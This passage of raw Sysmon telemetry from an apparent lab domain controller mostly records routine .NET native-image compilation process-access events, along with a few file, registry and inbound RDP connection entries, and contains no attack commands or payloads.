.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076516Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.404{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF5-607E-B90D-00000000BB01}6392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076515Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.389{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBF5-607E-B90D-00000000BB01}6392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076514Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.389{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF5-607E-B90D-00000000BB01}6392C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076513Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.342{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF5-607E-B80D-00000000BB01}2088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076512Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.326{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBF5-607E-B80D-00000000BB01}2088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076511Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.326{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF5-607E-B80D-00000000BB01}2088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076510Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.279{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF5-607E-B70D-00000000BB01}5632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076509Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.264{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBF5-607E-B70D-00000000BB01}5632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076508Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.264{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF5-607E-B70D-00000000BB01}5632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076507Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.233{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF5-607E-B60D-00000000BB01}5796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076506Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.217{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBF5-607E-B60D-00000000BB01}5796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076505Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.217{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF5-607E-B60D-00000000BB01}5796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076504Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.186{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF5-607E-B50D-00000000BB01}7112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076503Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.170{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBF5-607E-B50D-00000000BB01}7112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076502Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.170{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF5-607E-B50D-00000000BB01}7112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000076501Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.170{A7A01FEF-EBD6-607E-B70C-00000000BB01}2124NT AUTHORITY\NETWORK SERVICEC:\Windows\system32\sppsvc.exeC:\Windows\System32\spp\store\2.0\cache\cache.datMD5=7C8532600DC436ABFF5FA4CF05F5BF94,SHA256=344E0B7C48262CC1856BE181226210854289F89AD47A0B0A8F41CCCD6A60B69F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076500Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.108{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF5-607E-B40D-00000000BB01}2100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076499Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.092{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBF5-607E-B40D-00000000BB01}2100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076498Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.092{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF5-607E-B40D-00000000BB01}2100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 354300x800000000000000076497Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:55.092{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com49691-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000076496Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.045{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBF5-607E-B30D-00000000BB01}4032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000076495Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.029{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ABB2FB8787AC79E1451DD0A9AF030786,SHA256=B5103803F2E42752E9E5A3680F6ED137729062FD91B3F2153B510508394C2DEC,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000076494Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:57.029{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{4D2F086C-6EA3-101B-A18A-00AA00446E07}\InprocServer32\(Default)mapi32.dll 10341000x800000000000000076493Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.029{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBF5-607E-B30D-00000000BB01}4032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076492Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:57.029{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBF5-607E-B30D-00000000BB01}4032C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wo